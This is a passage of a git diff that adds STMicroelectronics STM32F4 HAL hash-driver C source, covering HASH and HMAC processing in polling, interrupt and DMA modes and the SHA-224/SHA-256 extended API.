uint8_t *pInBuffer, uint32_t Size, uint32_t Algorithm) +{ + uint32_t inputaddr; + uint32_t inputSize; + HAL_StatusTypeDef status ; + HAL_HASH_StateTypeDef State_tmp = hhash->State; + + #if defined (HASH_CR_MDMAT) + /* Make sure the input buffer size (in bytes) is a multiple of 4 when MDMAT bit is set + (case of multi-buffer HASH processing) */ + assert_param(IS_HASH_DMA_MULTIBUFFER_SIZE(Size)); + #endif /* MDMA defined*/ + /* If State is ready or suspended, start or resume polling-based HASH processing */ + if ((State_tmp == HAL_HASH_STATE_READY) || (State_tmp == HAL_HASH_STATE_SUSPENDED)) + { + /* Check input parameters */ + if ((pInBuffer == NULL) || (Size == 0U) || + /* Check phase coherency. Phase must be + either READY (fresh start) + or PROCESS (multi-buffer HASH management) */ + ((hhash->Phase != HAL_HASH_PHASE_READY) && (!(IS_HASH_PROCESSING(hhash))))) + { + hhash->State = HAL_HASH_STATE_READY; + return HAL_ERROR; + } + + + /* Process Locked */ + __HAL_LOCK(hhash); + + /* If not a resumption case */ + if (hhash->State == HAL_HASH_STATE_READY) + { + /* Change the HASH state */ + hhash->State = HAL_HASH_STATE_BUSY; + + /* Check if initialization phase has already been performed. + If Phase is already set to HAL_HASH_PHASE_PROCESS, this means the + API is processing a new input data message in case of multi-buffer HASH + computation. */ + if (hhash->Phase == HAL_HASH_PHASE_READY) + { + /* Select the HASH algorithm, clear HMAC mode and long key selection bit, reset the HASH processor core */ + MODIFY_REG(HASH->CR, HASH_CR_LKEY | HASH_CR_ALGO | HASH_CR_MODE | HASH_CR_INIT, Algorithm | HASH_CR_INIT); + + /* Set the phase */ + hhash->Phase = HAL_HASH_PHASE_PROCESS; + } + + /* Configure the Number of valid bits in last word of the message */ + __HAL_HASH_SET_NBVALIDBITS(Size); + + inputaddr = (uint32_t)pInBuffer; /* DMA transfer start address */ + inputSize = Size; /* DMA transfer size (in bytes) */ + + /* In case of suspension request, save the starting parameters */ + hhash->pHashInBuffPtr = pInBuffer; /* DMA transfer start address */ + hhash->HashInCount = Size; /* DMA transfer size (in bytes) */ + + } + /* If resumption case */ + else + { + /* Change the HASH state */ + hhash->State = HAL_HASH_STATE_BUSY; + + /* Resumption case, inputaddr and inputSize are not set to the API input parameters + but to those saved beforehand by HAL_HASH_DMAFeed_ProcessSuspend() when the + processing was suspended */ + inputaddr = (uint32_t)hhash->pHashInBuffPtr; /* DMA transfer start address */ + inputSize = hhash->HashInCount; /* DMA transfer size (in bytes) */ + + } + + /* Set the HASH DMA transfer complete callback */ + hhash->hdmain->XferCpltCallback = HASH_DMAXferCplt; + /* Set the DMA error callback */ + hhash->hdmain->XferErrorCallback = HASH_DMAError; + + /* Store number of words already pushed to manage proper DMA processing suspension */ + hhash->NbWordsAlreadyPushed = HASH_NBW_PUSHED(); + + /* Enable the DMA In DMA stream */ + status = HAL_DMA_Start_IT(hhash->hdmain, inputaddr, (uint32_t)&HASH->DIN, \ + (((inputSize % 4U) != 0U) ? ((inputSize + (4U - (inputSize % 4U))) / 4U) : \ + (inputSize / 4U))); + + /* Enable DMA requests */ + SET_BIT(HASH->CR, HASH_CR_DMAE); + + /* Process Unlock */ + __HAL_UNLOCK(hhash); + + /* Return function status */ + if (status != HAL_OK) + { + /* Update HASH state machine to error */ + hhash->State = HAL_HASH_STATE_ERROR; + } + + return status; + } + else + { + return HAL_BUSY; + } +} + +/** + * @brief Return the computed digest. + * @note The API waits for DCIS to be set then reads the computed digest. + * @param hhash HASH handle. + * @param pOutBuffer pointer to the computed digest. + * @param Timeout Timeout value. + * @retval HAL status + */ +HAL_StatusTypeDef HASH_Finish(HASH_HandleTypeDef *hhash, uint8_t *pOutBuffer, uint32_t Timeout) +{ + + if (hhash->State == HAL_HASH_STATE_READY) + { + /* Check parameter */ + if (pOutBuffer == NULL) + { + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hhash); + + /* Change the HASH state to busy */ + hhash->State = HAL_HASH_STATE_BUSY; + + /* Wait for DCIS flag to be set */ + if (HASH_WaitOnFlagUntilTimeout(hhash, HASH_FLAG_DCIS, RESET, Timeout) != HAL_OK) + { + return HAL_TIMEOUT; + } + + /* Read the message digest */ + HASH_GetDigest(pOutBuffer, HASH_DIGEST_LENGTH()); + + /* Change the HASH state to ready */ + hhash->State = HAL_HASH_STATE_READY; + + /* Reset HASH state machine */ + hhash->Phase = HAL_HASH_PHASE_READY; + + /* Process UnLock */ + __HAL_UNLOCK(hhash); + + /* Return function status */ + return HAL_OK; + + } + else + { + return HAL_BUSY; + } + +} + + +/** + * @brief Initialize the HASH peripheral in HMAC mode, next process pInBuffer then + * read the computed digest. + * @note Digest is available in pOutBuffer. + * @note Same key is used for the inner and the outer hash functions; pointer to key and + * key size are respectively stored in hhash->Init.pKey and hhash->Init.KeySize. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param pOutBuffer pointer to the computed digest. + * @param Timeout Timeout value. + * @param Algorithm HASH algorithm. + * @retval HAL status + */ +HAL_StatusTypeDef HMAC_Start(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, uint8_t *pOutBuffer, + uint32_t Timeout, uint32_t Algorithm) +{ + HAL_HASH_StateTypeDef State_tmp = hhash->State; + + /* If State is ready or suspended, start or resume polling-based HASH processing */ + if ((State_tmp == HAL_HASH_STATE_READY) || (State_tmp == HAL_HASH_STATE_SUSPENDED)) + { + /* Check input parameters */ + if ((pInBuffer == NULL) || (Size == 0U) || (hhash->Init.pKey == NULL) || (hhash->Init.KeySize == 0U) + || (pOutBuffer == NULL)) + { + hhash->State = HAL_HASH_STATE_READY; + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hhash); + + /* Change the HASH state */ + hhash->State = HAL_HASH_STATE_BUSY; + + /* Check if initialization phase has already be performed */ + if (hhash->Phase == HAL_HASH_PHASE_READY) + { + /* Check if key size is larger than 64 bytes, accordingly set LKEY and the other setting bits */ + if (hhash->Init.KeySize > 64U) + { + MODIFY_REG(HASH->CR, HASH_CR_LKEY | HASH_CR_ALGO | HASH_CR_MODE | HASH_CR_INIT, + Algorithm | HASH_ALGOMODE_HMAC | HASH_HMAC_KEYTYPE_LONGKEY | HASH_CR_INIT); + } + else + { + MODIFY_REG(HASH->CR, HASH_CR_LKEY | HASH_CR_ALGO | HASH_CR_MODE | HASH_CR_INIT, + Algorithm | HASH_ALGOMODE_HMAC | HASH_CR_INIT); + } + /* Set the phase to Step 1 */ + hhash->Phase = HAL_HASH_PHASE_HMAC_STEP_1; + /* Resort to hhash internal fields to feed the Peripheral. + Parameters will be updated in case of suspension to contain the proper + information at resumption time. */ + hhash->pHashOutBuffPtr = pOutBuffer; /* Output digest address */ + hhash->pHashInBuffPtr = pInBuffer; /* Input data address, HMAC_Processing input + parameter for Step 2 */ + hhash->HashInCount = Size; /* Input data size, HMAC_Processing input + parameter for Step 2 */ + hhash->HashBuffSize = Size; /* Store the input buffer size for the whole HMAC process*/ + hhash->pHashKeyBuffPtr = hhash->Init.pKey; /* Key address, HMAC_Processing input parameter for Step + 1 and Step 3 */ + hhash->HashKeyCount = hhash->Init.KeySize; /* Key size, HMAC_Processing input parameter for Step 1 + and Step 3 */ + } + + /* Carry out HMAC processing */ + return HMAC_Processing(hhash, Timeout); + + } + else + { + return HAL_BUSY; + } +} + + + +/** + * @brief Initialize the HASH peripheral in HMAC mode, next process pInBuffer then + * read the computed digest in interruption mode. + * @note Digest is available in pOutBuffer. + * @note Same key is used for the inner and the outer hash functions; pointer to key and + * key size are respectively stored in hhash->Init.pKey and hhash->Init.KeySize. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param pOutBuffer pointer to the computed digest. + * @param Algorithm HASH algorithm. + * @retval HAL status + */ +HAL_StatusTypeDef HMAC_Start_IT(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, uint8_t *pOutBuffer, + uint32_t Algorithm) +{ + HAL_HASH_StateTypeDef State_tmp = hhash->State; + + /* If State is ready or suspended, start or resume IT-based HASH processing */ + if ((State_tmp == HAL_HASH_STATE_READY) || (State_tmp == HAL_HASH_STATE_SUSPENDED)) + { + /* Check input parameters */ + if ((pInBuffer == NULL) || (Size == 0U) || (hhash->Init.pKey == NULL) || (hhash->Init.KeySize == 0U) + || (pOutBuffer == NULL)) + { + hhash->State = HAL_HASH_STATE_READY; + return HAL_ERROR; + } + + /* Process Locked */ + __HAL_LOCK(hhash); + + /* Change the HASH state */ + hhash->State = HAL_HASH_STATE_BUSY; + + /* Initialize IT counter */ + hhash->HashITCounter = 1; + + /* Check if initialization phase has already be performed */ + if (hhash->Phase == HAL_HASH_PHASE_READY) + { + /* Check if key size is larger than 64 bytes, accordingly set LKEY and the other setting bits */ + if (hhash->Init.KeySize > 64U) + { + MODIFY_REG(HASH->CR, HASH_CR_LKEY | HASH_CR_ALGO | HASH_CR_MODE | HASH_CR_INIT, + Algorithm | HASH_ALGOMODE_HMAC | HASH_HMAC_KEYTYPE_LONGKEY | HASH_CR_INIT); + } + else + { + MODIFY_REG(HASH->CR, HASH_CR_LKEY | HASH_CR_ALGO | HASH_CR_MODE | HASH_CR_INIT, + Algorithm | HASH_ALGOMODE_HMAC | HASH_CR_INIT); + } + + /* Resort to hhash internal fields hhash->pHashInBuffPtr and hhash->HashInCount + to feed the Peripheral whatever the HMAC step. + Lines below are set to start HMAC Step 1 processing where key is entered first. */ + hhash->HashInCount = hhash->Init.KeySize; /* Key size */ + hhash->pHashInBuffPtr = hhash->Init.pKey ; /* Key address */ + + /* Store input and output parameters in handle fields to manage steps transition + or possible HMAC suspension/resumption */ + hhash->pHashKeyBuffPtr = hhash->Init.pKey; /* Key address */ + hhash->pHashMsgBuffPtr = pInBuffer; /* Input message address */ + hhash->HashBuffSize = Size; /* Input message size (in bytes) */ + hhash->pHashOutBuffPtr = pOutBuffer; /* Output digest address */ + + /* Configure the number of valid bits in last word of the key */ + __HAL_HASH_SET_NBVALIDBITS(hhash->Init.KeySize); + + /* Set the phase to Step 1 */ + hhash->Phase = HAL_HASH_PHASE_HMAC_STEP_1; + } + else if ((hhash->Phase == HAL_HASH_PHASE_HMAC_STEP_1) || (hhash->Phase == HAL_HASH_PHASE_HMAC_STEP_3)) + { + /* Restart IT-based HASH processing after Step 1 or Step 3 suspension */ + + } + else if (hhash->Phase == HAL_HASH_PHASE_HMAC_STEP_2) + { + /* Restart IT-based HASH processing after Step 2 suspension */ + + } + else + { + /* Error report as phase incorrect */ + /* Process Unlock */ + __HAL_UNLOCK(hhash); + hhash->State = HAL_HASH_STATE_READY; + return HAL_ERROR; + } + + /* Process Unlock */ + __HAL_UNLOCK(hhash); + + /* Enable Interrupts */ + __HAL_HASH_ENABLE_IT(HASH_IT_DINI | HASH_IT_DCI); + + /* Return function status */ + return HAL_OK; + } + else + { + return HAL_BUSY; + } + +} + + + +/** + * @brief Initialize the HASH peripheral in HMAC mode then initiate the required + * DMA transfers to feed the key and the input buffer to the Peripheral. + * @note Same key is used for the inner and the outer hash functions; pointer to key and + * key size are respectively stored in hhash->Init.pKey and hhash->Init.KeySize. + * @note In case of multi-buffer HMAC processing, the input buffer size (in bytes) must + * be a multiple of 4 otherwise, the HASH digest computation is corrupted. + * Only the length of the last buffer of the thread doesn't have to be a + * multiple of 4. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param Algorithm HASH algorithm. + * @retval HAL status + */ +HAL_StatusTypeDef HMAC_Start_DMA(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, uint32_t Algorithm) +{ + uint32_t inputaddr; + uint32_t inputSize; + HAL_StatusTypeDef status ; + HAL_HASH_StateTypeDef State_tmp = hhash->State; + /* Make sure the input buffer size (in bytes) is a multiple of 4 when digest calculation + is disabled (multi-buffer HMAC processing, MDMAT bit to be set) */ + assert_param(IS_HMAC_DMA_MULTIBUFFER_SIZE(hhash, Size)); + /* If State is ready or suspended, start or resume DMA-based HASH processing */ + if ((State_tmp == HAL_HASH_STATE_READY) || (State_tmp == HAL_HASH_STATE_SUSPENDED)) + { + /* Check input parameters */ + if ((pInBuffer == NULL) || (Size == 0U) || (hhash->Init.pKey == NULL) || (hhash->Init.KeySize == 0U) || + /* Check phase coherency. Phase must be + either READY (fresh start) + or one of HMAC PROCESS steps (multi-buffer HASH management) */ + ((hhash->Phase != HAL_HASH_PHASE_READY) && (!(IS_HMAC_PROCESSING(hhash))))) + { + hhash->State = HAL_HASH_STATE_READY; + return HAL_ERROR; + } + + + /* Process Locked */ + __HAL_LOCK(hhash); + + /* If not a case of resumption after suspension */ + if (hhash->State == HAL_HASH_STATE_READY) + { + /* Check whether or not initialization phase has already be performed */ + if (hhash->Phase == HAL_HASH_PHASE_READY) + { + /* Change the HASH state */ + hhash->State = HAL_HASH_STATE_BUSY; +#if defined(HASH_CR_MDMAT) + /* Check if key size is larger than 64 bytes, accordingly set LKEY and the other setting bits. + At the same time, ensure MDMAT bit is cleared. */ + if (hhash->Init.KeySize > 64U) + { + MODIFY_REG(HASH->CR, HASH_CR_MDMAT | HASH_CR_LKEY | HASH_CR_ALGO | HASH_CR_MODE | HASH_CR_INIT, + Algorithm | HASH_ALGOMODE_HMAC | HASH_HMAC_KEYTYPE_LONGKEY | HASH_CR_INIT); + } + else + { + MODIFY_REG(HASH->CR, HASH_CR_MDMAT | HASH_CR_LKEY | HASH_CR_ALGO | HASH_CR_MODE | HASH_CR_INIT, + Algorithm | HASH_ALGOMODE_HMAC | HASH_CR_INIT); + } +#else + /* Check if key size is larger than 64 bytes, accordingly set LKEY and the other setting bits */ + if (hhash->Init.KeySize > 64U) + { + MODIFY_REG(HASH->CR, HASH_CR_LKEY | HASH_CR_ALGO | HASH_CR_MODE | HASH_CR_INIT, + Algorithm | HASH_ALGOMODE_HMAC | HASH_HMAC_KEYTYPE_LONGKEY | HASH_CR_INIT); + } + else + { + MODIFY_REG(HASH->CR, HASH_CR_LKEY | HASH_CR_ALGO | HASH_CR_MODE | HASH_CR_INIT, + Algorithm | HASH_ALGOMODE_HMAC | HASH_CR_INIT); + } +#endif /* HASH_CR_MDMAT*/ + /* Store input aparameters in handle fields to manage steps transition + or possible HMAC suspension/resumption */ + hhash->HashInCount = hhash->Init.KeySize; /* Initial size for first DMA transfer (key size) */ + hhash->pHashKeyBuffPtr = hhash->Init.pKey; /* Key address */ + hhash->pHashInBuffPtr = hhash->Init.pKey ; /* First address passed to DMA (key address at Step 1) */ + hhash->pHashMsgBuffPtr = pInBuffer; /* Input data address */ + hhash->HashBuffSize = Size; /* input data size (in bytes) */ + + /* Set DMA input parameters */ + inputaddr = (uint32_t)(hhash->Init.pKey); /* Address passed to DMA (start by entering Key message) */ + inputSize = hhash->Init.KeySize; /* Size for first DMA transfer (in bytes) */ + + /* Configure the number of valid bits in last word of the key */ + __HAL_HASH_SET_NBVALIDBITS(hhash->Init.KeySize); + + /* Set the phase to Step 1 */ + hhash->Phase = HAL_HASH_PHASE_HMAC_STEP_1; + + } + else if (hhash->Phase == HAL_HASH_PHASE_HMAC_STEP_2) + { + /* Process a new input data message in case of multi-buffer HMAC processing + (this is not a resumption case) */ + + /* Change the HASH state */ + hhash->State = HAL_HASH_STATE_BUSY; + + /* Save input parameters to be able to manage possible suspension/resumption */ + hhash->HashInCount = Size; /* Input message address */ + hhash->pHashInBuffPtr = pInBuffer; /* Input message size in bytes */ + + /* Set DMA input parameters */ + inputaddr = (uint32_t)pInBuffer; /* Input message address */ + inputSize = Size; /* Input message size in bytes */ + + if (hhash->DigestCalculationDisable == RESET) + { + /* This means this is the last buffer of the multi-buffer sequence: DCAL needs to be set. */ +#if defined(HASH_CR_MDMAT) + __HAL_HASH_RESET_MDMAT(); +#endif /* HASH_CR_MDMAT*/ + __HAL_HASH_SET_NBVALIDBITS(inputSize); + } + } + else + { + /* Phase not aligned with handle READY state */ + __HAL_UNLOCK(hhash); + /* Return function status */ + return HAL_ERROR; + } + } + else + { + /* Resumption case (phase may be Step 1, 2 or 3) */ + + /* Change the HASH state */ + hhash->State = HAL_HASH_STATE_BUSY; + + /* Set DMA input parameters at resumption location; + inputaddr and inputSize are not set to the API input parameters + but to those saved beforehand by HAL_HASH_DMAFeed_ProcessSuspend() when the + processing was suspended. */ + inputaddr = (uint32_t)(hhash->pHashInBuffPtr); /* Input message address */ + inputSize = hhash->HashInCount; /* Input message size in bytes */ + } + + + /* Set the HASH DMA transfer complete callback */ + hhash->hdmain->XferCpltCallback = HASH_DMAXferCplt; + /* Set the DMA error callback */ + hhash->hdmain->XferErrorCallback = HASH_DMAError; + + /* Store number of words already pushed to manage proper DMA processing suspension */ + hhash->NbWordsAlreadyPushed = HASH_NBW_PUSHED(); + + /* Enable the DMA In DMA stream */ + status = HAL_DMA_Start_IT(hhash->hdmain, inputaddr, (uint32_t)&HASH->DIN, \ + (((inputSize % 4U) != 0U) ? ((inputSize + (4U - (inputSize % 4U))) / 4U) \ + : (inputSize / 4U))); + /* Enable DMA requests */ + SET_BIT(HASH->CR, HASH_CR_DMAE); + + /* Process Unlocked */ + __HAL_UNLOCK(hhash); + + /* Return function status */ + if (status != HAL_OK) + { + /* Update HASH state machine to error */ + hhash->State = HAL_HASH_STATE_ERROR; + } + + /* Return function status */ + return status; + } + else + { + return HAL_BUSY; + } +} +/** + * @} + */ + +#endif /* HAL_HASH_MODULE_ENABLED */ + +/** + * @} + */ +#endif /* HASH*/ +/** + * @} + */ + + + +/************************ (C) COPYRIGHT STMicroelectronics *****END OF FILE****/ diff --git a/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_hash_ex.c b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_hash_ex.c new file mode 100644 index 000000000..e733f5ad7 --- /dev/null +++ b/body/board/inc/STM32F4xx_HAL_Driver/Src/stm32f4xx_hal_hash_ex.c @@ -0,0 +1,1043 @@ +/** + ****************************************************************************** + * @file stm32f4xx_hal_hash_ex.c + * @author MCD Application Team + * @brief Extended HASH HAL module driver. + * This file provides firmware functions to manage the following + * functionalities of the HASH peripheral for SHA-224 and SHA-256 + * algorithms: + * + HASH or HMAC processing in polling mode + * + HASH or HMAC processing in interrupt mode + * + HASH or HMAC processing in DMA mode + * Additionally, this file provides functions to manage HMAC + * multi-buffer DMA-based processing for MD-5, SHA-1, SHA-224 + * and SHA-256. + * + * + @verbatim + =============================================================================== + ##### HASH peripheral extended features ##### + =============================================================================== + [..] + The SHA-224 and SHA-256 HASH and HMAC processing can be carried out exactly + the same way as for SHA-1 or MD-5 algorithms. + (#) Three modes are available. + (##) Polling mode: processing APIs are blocking functions + i.e. they process the data and wait till the digest computation is finished, + e.g. HAL_HASHEx_xxx_Start() + (##) Interrupt mode: processing APIs are not blocking functions + i.e. they process the data under interrupt, + e.g. HAL_HASHEx_xxx_Start_IT() + (##) DMA mode: processing APIs are not blocking functions and the CPU is + not used for data transfer i.e. the data transfer is ensured by DMA, + e.g. HAL_HASHEx_xxx_Start_DMA(). Note that in DMA mode, a call to + HAL_HASHEx_xxx_Finish() is then required to retrieve the digest. + + (#)Multi-buffer processing is possible in polling, interrupt and DMA modes. + (##) In polling mode, only multi-buffer HASH processing is possible. + API HAL_HASHEx_xxx_Accumulate() must be called for each input buffer, except for the last one. + User must resort to HAL_HASHEx_xxx_Accumulate_End() to enter the last one and retrieve as + well the computed digest. + + (##) In interrupt mode, API HAL_HASHEx_xxx_Accumulate_IT() must be called for each input buffer, + except for the last one. + User must resort to HAL_HASHEx_xxx_Accumulate_End_IT() to enter the last one and retrieve as + well the computed digest. + + (##) In DMA mode, multi-buffer HASH and HMAC processing are possible. + + (+++) HASH processing: once initialization is done, MDMAT bit must be set through + __HAL_HASH_SET_MDMAT() macro. + From that point, each buffer can be fed to the Peripheral through HAL_HASHEx_xxx_Start_DMA() API. + Before entering the last buffer, reset the MDMAT bit with __HAL_HASH_RESET_MDMAT() + macro then wrap-up the HASH processing in feeding the last input buffer through the + same API HAL_HASHEx_xxx_Start_DMA(). The digest can then be retrieved with a call to + API HAL_HASHEx_xxx_Finish(). + + (+++) HMAC processing (MD-5, SHA-1, SHA-224 and SHA-256 must all resort to + extended functions): after initialization, the key and the first input buffer are entered + in the Peripheral with the API HAL_HMACEx_xxx_Step1_2_DMA(). This carries out HMAC step 1 and + starts step 2. + The following buffers are next entered with the API HAL_HMACEx_xxx_Step2_DMA(). At this + point, the HMAC processing is still carrying out step 2. + Then, step 2 for the last input buffer and step 3 are carried out by a single call + to HAL_HMACEx_xxx_Step2_3_DMA(). + + The digest can finally be retrieved with a call to API HAL_HASH_xxx_Finish() for + MD-5 and SHA-1, to HAL_HASHEx_xxx_Finish() for SHA-224 and SHA-256. + + + @endverbatim + ****************************************************************************** + * @attention + * + *

© Copyright (c) 2016 STMicroelectronics. + * All rights reserved.

+ * + * This software component is licensed by ST under BSD 3-Clause license, + * the "License"; You may not use this file except in compliance with the + * License. You may obtain a copy of the License at: + * opensource.org/licenses/BSD-3-Clause + * + ****************************************************************************** + */ + +/* Includes ------------------------------------------------------------------*/ +#include "stm32f4xx_hal.h" + + + + +/** @addtogroup STM32F4xx_HAL_Driver + * @{ + */ +#if defined (HASH) + +/** @defgroup HASHEx HASHEx + * @brief HASH HAL extended module driver. + * @{ + */ +#ifdef HAL_HASH_MODULE_ENABLED +/* Private typedef -----------------------------------------------------------*/ +/* Private define ------------------------------------------------------------*/ +/* Private functions ---------------------------------------------------------*/ +#if defined (HASH_CR_MDMAT) + +/** @defgroup HASHEx_Exported_Functions HASH Extended Exported Functions + * @{ + */ + +/** @defgroup HASHEx_Exported_Functions_Group1 HASH extended processing functions in polling mode + * @brief HASH extended processing functions using polling mode. + * +@verbatim + =============================================================================== + ##### Polling mode HASH extended processing functions ##### + =============================================================================== + [..] This section provides functions allowing to calculate in polling mode + the hash value using one of the following algorithms: + (+) SHA224 + (++) HAL_HASHEx_SHA224_Start() + (++) HAL_HASHEx_SHA224_Accmlt() + (++) HAL_HASHEx_SHA224_Accmlt_End() + (+) SHA256 + (++) HAL_HASHEx_SHA256_Start() + (++) HAL_HASHEx_SHA256_Accmlt() + (++) HAL_HASHEx_SHA256_Accmlt_End() + + [..] For a single buffer to be hashed, user can resort to HAL_HASH_xxx_Start(). + + [..] In case of multi-buffer HASH processing (a single digest is computed while + several buffers are fed to the Peripheral), the user can resort to successive calls + to HAL_HASHEx_xxx_Accumulate() and wrap-up the digest computation by a call + to HAL_HASHEx_xxx_Accumulate_End(). + +@endverbatim + * @{ + */ + + +/** + * @brief Initialize the HASH peripheral in SHA224 mode, next process pInBuffer then + * read the computed digest. + * @note Digest is available in pOutBuffer. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param pOutBuffer pointer to the computed digest. Digest size is 28 bytes. + * @param Timeout Timeout value + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASHEx_SHA224_Start(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, + uint8_t *pOutBuffer, uint32_t Timeout) +{ + return HASH_Start(hhash, pInBuffer, Size, pOutBuffer, Timeout, HASH_ALGOSELECTION_SHA224); +} + +/** + * @brief If not already done, initialize the HASH peripheral in SHA224 mode then + * processes pInBuffer. + * @note Consecutive calls to HAL_HASHEx_SHA224_Accmlt() can be used to feed + * several input buffers back-to-back to the Peripheral that will yield a single + * HASH signature once all buffers have been entered. Wrap-up of input + * buffers feeding and retrieval of digest is done by a call to + * HAL_HASHEx_SHA224_Accmlt_End(). + * @note Field hhash->Phase of HASH handle is tested to check whether or not + * the Peripheral has already been initialized. + * @note Digest is not retrieved by this API, user must resort to HAL_HASHEx_SHA224_Accmlt_End() + * to read it, feeding at the same time the last input buffer to the Peripheral. + * @note The input buffer size (in bytes) must be a multiple of 4 otherwise, the + * HASH digest computation is corrupted. Only HAL_HASHEx_SHA224_Accmlt_End() is able + * to manage the ending buffer with a length in bytes not a multiple of 4. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes, must be a multiple of 4. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASHEx_SHA224_Accmlt(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size) +{ + return HASH_Accumulate(hhash, pInBuffer, Size, HASH_ALGOSELECTION_SHA224); +} + +/** + * @brief End computation of a single HASH signature after several calls to HAL_HASHEx_SHA224_Accmlt() API. + * @note Digest is available in pOutBuffer. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param pOutBuffer pointer to the computed digest. Digest size is 28 bytes. + * @param Timeout Timeout value + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASHEx_SHA224_Accmlt_End(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, + uint8_t *pOutBuffer, uint32_t Timeout) +{ + return HASH_Start(hhash, pInBuffer, Size, pOutBuffer, Timeout, HASH_ALGOSELECTION_SHA224); +} + +/** + * @brief Initialize the HASH peripheral in SHA256 mode, next process pInBuffer then + * read the computed digest. + * @note Digest is available in pOutBuffer. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param pOutBuffer pointer to the computed digest. Digest size is 32 bytes. + * @param Timeout Timeout value + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASHEx_SHA256_Start(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, + uint8_t *pOutBuffer, uint32_t Timeout) +{ + return HASH_Start(hhash, pInBuffer, Size, pOutBuffer, Timeout, HASH_ALGOSELECTION_SHA256); +} + +/** + * @brief If not already done, initialize the HASH peripheral in SHA256 mode then + * processes pInBuffer. + * @note Consecutive calls to HAL_HASHEx_SHA256_Accmlt() can be used to feed + * several input buffers back-to-back to the Peripheral that will yield a single + * HASH signature once all buffers have been entered. Wrap-up of input + * buffers feeding and retrieval of digest is done by a call to + * HAL_HASHEx_SHA256_Accmlt_End(). + * @note Field hhash->Phase of HASH handle is tested to check whether or not + * the Peripheral has already been initialized. + * @note Digest is not retrieved by this API, user must resort to HAL_HASHEx_SHA256_Accmlt_End() + * to read it, feeding at the same time the last input buffer to the Peripheral. + * @note The input buffer size (in bytes) must be a multiple of 4 otherwise, the + * HASH digest computation is corrupted. Only HAL_HASHEx_SHA256_Accmlt_End() is able + * to manage the ending buffer with a length in bytes not a multiple of 4. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes, must be a multiple of 4. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASHEx_SHA256_Accmlt(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size) +{ + return HASH_Accumulate(hhash, pInBuffer, Size, HASH_ALGOSELECTION_SHA256); +} + +/** + * @brief End computation of a single HASH signature after several calls to HAL_HASHEx_SHA256_Accmlt() API. + * @note Digest is available in pOutBuffer. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param pOutBuffer pointer to the computed digest. Digest size is 32 bytes. + * @param Timeout Timeout value + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASHEx_SHA256_Accmlt_End(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, + uint8_t *pOutBuffer, uint32_t Timeout) +{ + return HASH_Start(hhash, pInBuffer, Size, pOutBuffer, Timeout, HASH_ALGOSELECTION_SHA256); +} + +/** + * @} + */ + +/** @defgroup HASHEx_Exported_Functions_Group2 HASH extended processing functions in interrupt mode + * @brief HASH extended processing functions using interrupt mode. + * +@verbatim + =============================================================================== + ##### Interruption mode HASH extended processing functions ##### + =============================================================================== + [..] This section provides functions allowing to calculate in interrupt mode + the hash value using one of the following algorithms: + (+) SHA224 + (++) HAL_HASHEx_SHA224_Start_IT() + (++) HAL_HASHEx_SHA224_Accmlt_IT() + (++) HAL_HASHEx_SHA224_Accmlt_End_IT() + (+) SHA256 + (++) HAL_HASHEx_SHA256_Start_IT() + (++) HAL_HASHEx_SHA256_Accmlt_IT() + (++) HAL_HASHEx_SHA256_Accmlt_End_IT() + +@endverbatim + * @{ + */ + + +/** + * @brief Initialize the HASH peripheral in SHA224 mode, next process pInBuffer then + * read the computed digest in interruption mode. + * @note Digest is available in pOutBuffer. + * @param hhash HASH handle. + * @param pInBuffer pointer to the input buffer (buffer to be hashed). + * @param Size length of the input buffer in bytes. + * @param pOutBuffer pointer to the computed digest. Digest size is 28 bytes. + * @retval HAL status + */ +HAL_StatusTypeDef HAL_HASHEx_SHA224_Start_IT(HASH_HandleTypeDef *hhash, uint8_t *pInBuffer, uint32_t Size, + uint8_t *pOutBuffer) +{ + return HASH_Start_IT(hhash, pInBuffer, Size, pOutBuffer, HASH_ALGOSELECTION_SHA224); +} + +/** + * @brief If not already done, initialize the HASH peripheral in SHA224 mode then + * processes pInBuffer in interruption mode. + * @note Consecutive calls to HAL_HASHEx_SHA224_Accmlt_IT() can be used to feed + * several input buffers back-to-back to the Peripheral that will yield a single + * HASH signature once all buffers have been entered. Wrap-up of input + * buffers feeding and retrieval of digest is done by a call to + * HAL_HASHEx_SHA224_Accmlt_End_IT(). + * @note Field hhash->Phase of HASH handle is tested to check whether or not + * the Peripheral has already been initialized. + * @note The input buffer size (in bytes) must be a multiple of 4 otherwise, the + * HASH digest computation is corrupted. 